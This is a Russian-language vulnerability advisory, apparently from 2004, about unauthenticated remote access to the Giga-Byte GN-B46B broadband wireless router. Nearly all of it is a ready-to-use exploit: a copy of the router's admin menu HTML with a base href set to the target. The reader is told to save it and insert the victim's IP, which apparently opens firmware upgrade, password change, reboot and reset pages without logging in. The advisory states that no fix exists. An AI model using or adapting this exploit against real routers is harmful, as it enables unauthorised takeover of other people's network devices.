Удаленный неавторизованный доступ к GN-B46B broadband wireless router от Giga-Byte Technology
| Дата публикации: | 26.02.2004 |
| Всего просмотров: | 3044 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Giga-Byte Technology Router Model GN-B46B; Firmware Version 1.003.00
Описание: Уязвимость обнаружена в GN-B46B broadband wireless router от Giga-Byte Technology. Удаленный пользователь может получить доступ к устройству. Пример/Эксплоит:
Just copy this to a ".html" file and replace <host> with the target's IP.
------------------------------------ Cut
Here --------------------------------------
<html>htdocs
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="expires" CONTENT="0">
<STYLE> #foldheader {CURSOR: hand}</STYLE>
<base href="http://<host>">
<script language="javascript">
<!--
var lastIndex=-1;
function change(){
if (event.srcElement.id=="foldheader") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+2]
if (nested.style.display=="none") {
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+2;
}
else {
lastIndex=-1;
nested.style.display="none"
}
}
if (event.srcElement.id=="foldimage") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+1]
if (nested.style.display=="none") {
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+1;
}
else {
lastIndex=-1;
nested.style.display="none"
}
}
window.self.document.onclick=change
if(document.images){
image1off=new Image
image1off.src="../picture/button_setup.gif"
image1on=new Image
image1on.src="../picture/button_setup_over.gif"
image2off=new Image
image2off.src="../picture/button_status.gif"
image2on=new Image
image2on.src="../picture/button_status_over.gif"
image3off=new Image
image3off.src="../picture/button_logout.gif"
image3on=new Image
image3on.src="../picture/button_logout_over.gif"
}
function imgOn(imgName){
if(document.images){
document[imgName].src=eval(imgName+"on.src")
}
function imgOff(imgName){
if(document.images){
document[imgName].src=eval(imgName+"off.src")
}
function MoveOn(which_log, item)
dd = new Date();
time = dd.getTime();
offset = dd.getTimezoneOffset();
item.href = '../cgi-bin/SetData.cgi?LogMenu' + which_log + '\+' +
Math.round(time/1000) + '\+' + offset;
//-->
</script>
<title>English</title>
<style type="text/css">
body{font-family: Arial,verdana,Helvetica; font-size: 10pt; line-height:
18px;background:#ffffff;}
.blueBg {background:#79A7EF;}
.blackBg {background:#000000;}
.grayBg {background:#EEEEEE;}
.lightBlueBg
{background:#9FBEEE;font-size:10pt;color:#000000;font-weight:bold;}
.lightBlackBg
{background:#000000;font-size:10pt;color:#FFFFFF;font-weight:bold;}
.whiteBg {background:#ffffff;}
.redText {color:#FF9000;}
.tagText {color:#FF9000;font-weight:bold;background:#ffffff;}
.blueText {color: rgb(0,0,0);}
.orangeText {color:#FF9000;font-weight:bold;}
.heading{color:#000000;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.heading1{color:#3333CC;font-size:10pt;background:#Eeeeee;}
.heading2{color:#3333CC;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.headingLink{font-size:10pt;font-weight:bold;color:#ffffff;}
.title{color:#ffffff;font-size:20pt;font-weight:bold;background:#9FBEEE;}
.titleSub{color:#3333CC;font-size:15pt;font-weight:bold;background:#ffffff;}
.titleSub1{color:#000000;font-size:13pt;font-weight:bold;background:#ffffff;
.buttonText{background-color:
rgb(255,144,0);color:#ffffff;font-weight:bold;}
A:link {color:#FFFFFF; font-style: normal; cursor:
hand;text-decoration:none;}
A:visited {color:rgb(255,255,255); font-style:
normal;text-decoration:none;}
A:active {color:#9FBEEE; font-style: normal;text-decoration:none;}
A:hover {color:#9FBEEE; font-style:bold;text-decoration:underline;}
</style>
</head>
<BODY style="background-color: #000000">
<center>
<table cellpadding=0 cellspacing=0 border=0 width=180 class="blackBg">
<tr>
<td height="25" colspan="3"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
<tr>
<td colspan="3"><a href="/htdocs/BasicLANSetup.htm" target=main
onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')">
<img src="../picture/button_setup.gif" border="0" name="image1"
width="184" height="23"></a></td>
</tr>
<!--
<tr>
<td colspan="3"><a href="/htdocs/status.htm" target=main
onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
-->
<tr>
<td colspan="3"><a href="../cgi-bin/SetData.cgi?ShowStatus"
href="status.htm" target=main onMouseover="imgOn('image2')";
onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
<tr>
<td colspan="3"><a href="/htdocs/Logout.htm" target=_top
onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')">
<img src="../picture/button_logout.gif" border="0" name="image3"
width="184" height="29"></a></td>
</tr>
<tr>
<td colspan="3" height="8"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_advancedSetup.gif" border="0" width="174"
height="34"></td>
</tr>
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"><
/td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Network Configur
ation
<table id="network" border="0">
<tr class="headingLink"><td> <a
href="NetworkSetup3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> LAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Setting</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Wireless Configu
ration
<table id="wireless" border="0">
<tr class="headingLink"><td> <a
href="WirelessSetup2B.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> 802.11b</a></td></tr>
<tr class="headingLink"><td> <a
href="MACcontrol11b.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> MAC Access Control</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/StaticRouting.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Static Routing Table</a></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Virtual Server
<table id="virtual" border="0">
<tr class="headingLink"><td> <a
href="VirtualServer1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> DMZ</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE/DHCP/Static</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE Unnumber</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Firewall Rule
<table id="firewall" border="0">
<tr class="headingLink"><td> <a
href="Firewall1.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7"
height="7"> Security</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall3.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7">&nb
sp;VPN Pass
Through</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall2.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7">&nb
sp;Static
Rule</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/DNSReplay.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> DNS Replay</a></td>
</tr>
<tr>
<td height="7"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"><
/td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_management.gif" border="0" width="174"
height="31"></td>
</tr>
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"><
/td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?ShowPPPMonitor"
target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> PPP Monitor</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Reboot.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Reboot</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Initialization.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Initialization</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangePassword.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change Password</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangeMAC.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change WAN MAC</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/UpgradeFirmware.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Upgrade Firmware</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/BackUpRestore.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> BackUp/Restore</a></td>
</tr>
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Log Information
<table id="log" border="0">
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('firelog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> Firewall Log</a></td></tr>
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('connlog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Connection</a></td></tr>
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('upnplog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> UPnP Log</a></td></tr>
</table>
</td>
</tr>
<!--
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?LogMenufirelog+0+0"
target=main onclick="MoveOn('firelog')">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Log Information</a></td>
</tr>
-->
<tr>
<td valign="top"><a href="/htdocs/Save.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Save Maintenance</a></td>
</tr>
<tr>
<td valign="top"><a href="../others/Help.English.htm" target="_b
lank">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Help</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Ping.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Ping</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/About.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> About</a></td>
</tr>
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"><
/td>
</tr>
<tr>
<!--<td colspan="3"><img src="../picture/banner_bottom.gif" width="
184"
height="38"></td>-->
</tr>
<tr>
<td colspan="3" height="20"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
</table>
</center>
</body>
</html>
<script language="javascript">
if(navigator.appName == "Microsoft Internet Explorer" &&
parseInt(navigator.appVersion) >= 4)
network.style.display = "none" ;
wireless.style.display = "none" ;
virtual.style.display = "none" ;
firewall.style.display = "none" ;
log.style.display = "none" ;
</script>
------------------------------------ Cut
Here --------------------------------------
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
URL производителя:http://www.giga-byte.com/Communication/Products/Products_Wireless_GN-B46B.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | igabyte Broadband Router - Multiple Vulnerabilities |